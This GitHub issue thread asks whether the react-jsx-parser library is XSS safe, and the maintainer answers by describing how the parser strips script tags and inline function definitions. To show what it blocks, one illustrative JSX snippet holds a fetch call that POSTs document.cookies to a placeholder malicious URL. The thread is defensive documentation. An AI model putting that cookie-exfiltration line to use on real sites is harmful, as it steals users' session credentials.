### ISSUE TITLE
Is this library XSS safe? [Question]

### ISSUE THREAD

**Issue by RodrigoTomeES** [TroyAlford/react-jsx-parser#109]
Hi,

I want to know if this library is XSS safe thanks!!,

Rodrigo

**Comment by TroyAlford** [comment]
@RodrigoTomeES that's a fairly vague/ambiguous question. It entirely depends on what you do with it, of course. I've certainly taken steps to ensure that it is, but of course it's open-source, and I provide no warranty to that.

The most likely attack vector with a library like this is one in which you're allowing end-users to write their own JSX, which are saved to a database - then rendering them as fully-processed HTML to other end-users. In this scenario, a malicious author might attempt to inject scripts into the code to steal information or otherwise do harm to any/all clients who view the rendered version of what they wrote.

To avoid this, `react-jsx-parser` only allows `<script />` tags if you _explicitly_ whitelist them, and it does _not_ process arbitrary JavaScript (such as function definitions, created in JSX).

Example:
```
<script>(function sendEndUserDataToMyMaliciousWebsite() { /* some code here */ })()</script>
```
This won't be run because the `script` tag is eliminated entirely - unless, as stated above, you've explicitly whitelisted it.

Example:
```
<Foo onClick={() => {
  fetch('http://my.malicious.url', { body: document.cookies, method: 'POST' })
}}>Some Content</Foo>
```
This won't be run because the `() => {}` definition will be discarded by the parser, rather than transpiled/converted into a function.

Example:
```
<Foo onClick={myMaliciousFunction} />
```
This won't be run unless you have _explicitly_ added `myMaliciousFunction` to the `bindings` for the `JSXParser`. So - don't do that. :)

Caveats:
Now - of course - if someone can inject scripts into your page some _other_ way, it's entirely possible they could hijack functions you've bound to the parser, or otherwise compromise you. It goes without saying that this falls well outside the scope of this library to prevent.

Proper XSS prevention is a careful process which requires multiple layers of security and regular review. This lib has done its part not to open up any glaring holes - but your security is only ever as strong as your weakest vulnerability.

**Comment by RodrigoTomeES** [comment]
@TroyAlford thanks for the answer!! You are right, sorry for my ambiguous question, I was referring to XSS protection in the parser. The two scenarios that you have proposed for XSS protection is what I was thinking.
